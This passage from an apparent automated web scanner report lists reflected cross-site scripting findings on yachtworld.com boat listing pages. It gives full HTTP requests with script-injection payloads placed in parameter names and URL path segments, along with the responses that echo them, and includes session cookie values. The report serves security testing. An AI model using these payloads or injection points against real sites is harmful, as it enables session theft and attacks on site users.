savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:43 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 17 Dec 2010 17:08:15 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:43 GMT
Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&.5dd35"><script>alert(1)</script>4deefd4b163=1&currency=USD&units=Feet&seo=0&checked_boats=1990703&boat_id=1990703&back=/core/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States&boat_id=1990703">
...[SNIP]...

3.133. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd779"><script>alert(1)</script>1efb3ea8727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States?cd779"><script>alert(1)</script>1efb3ea8727=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:16:33 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 17 Dec 2010 17:08:15 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 21:16:33 GMT
Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1990703&cd779"><script>alert(1)</script>1efb3ea8727=1&boat_id=1990703&back=/core/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States&boat_id=1990703">
...[SNIP]...

3.134. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/32-Regulator-With-Trailer-reduced-2266476/Destin/FL/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b050"><script>alert(1)</script>178b29ba6e6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin9b050"><script>alert(1)</script>178b29ba6e6/FL/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; s_pers=%20s_nr%3D1296155975932%7C1298747975932%3B%20s_lv%3D1296155975933%7C1390763975933%3B%20s_lv_s%3DFirst%2520Visit%7C1296157775933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.4.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:49 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 21:44:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:39:48 GMT
Set-Cookie: VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 28566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
"nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2266476&boat_id=2266476&back=/core/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin9b050"><script>alert(1)</script>178b29ba6e6/FL/United-States&boat_id=2266476">
...[SNIP]...

3.135. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/32-Regulator-With-Trailer-reduced-2266476/Destin/FL/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4775"><script>alert(1)</script>35827325622 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FLc4775"><script>alert(1)</script>35827325622/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; s_pers=%20s_nr%3D1296155975932%7C1298747975932%3B%20s_lv%3D1296155975933%7C1390763975933%3B%20s_lv_s%3DFirst%2520Visit%7C1296157775933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.4.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:13 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 21:44:50 GMT
Content-Language: en-US
